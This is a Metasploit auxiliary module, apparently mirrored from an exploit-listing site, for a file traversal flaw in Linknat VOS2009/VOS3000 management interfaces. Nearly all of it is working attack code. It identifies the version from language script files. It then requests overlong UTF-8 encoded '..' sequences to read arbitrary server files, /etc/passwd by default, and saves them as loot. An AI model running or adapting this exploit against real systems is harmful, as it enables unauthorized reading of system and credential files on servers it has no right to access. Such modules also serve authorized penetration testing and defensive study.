Share
## https://sploitus.com/exploit?id=PACKETSTORM:181044
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Linknat Vos Manager Traversal',  
'Description' => %q(  
This module attempts to test whether a file traversal vulnerability  
is present in version of linknat vos2009/vos3000  
),  
'References' => [  
['URL', 'http://www.linknat.com/'],  
['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458']  
],  
'Author' => ['Nixawk'],  
'License' => MSF_LICENSE))  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']),  
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),  
OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5])  
])  
end  
  
def vos_uri(path)  
full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}"  
end  
  
def vos_version  
case target_uri.to_s  
when /chs/i  
js_uri = vos_uri('js/lang_zh_cn.js')  
when /cht/i  
js_uri = vos_uri('js/lang_zh_tw.js')  
when /eng/i  
js_uri = vos_uri('js/lang_en_us.js')  
else  
print_warning("#{full_uri} - Please identify VOS version manually")  
return  
end  
  
res = send_request_cgi('uri' => js_uri)  
return unless res  
  
vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}")  
  
return unless res.code == 200  
res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil  
res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? minor = $1 : minor = nil  
"#{major} #{minor}"  
end  
  
def run_host(ip)  
version = vos_version  
unless version  
print_error("#{full_uri} - Failed to identify Linknat VOS")  
return  
end  
  
traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH']  
filename = datastore['FILEPATH']  
  
uri = normalize_uri(target_uri.path, '..', traversal, filename)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => uri  
)  
  
if res && res.code == 200  
path = store_loot(  
version,  
'text/plain',  
ip,  
res.body,  
filename)  
print_good("#{full_uri} - File saved in: #{path}")  
else  
print_error("#{full_uri} - Nothing was downloaded")  
end  
end  
end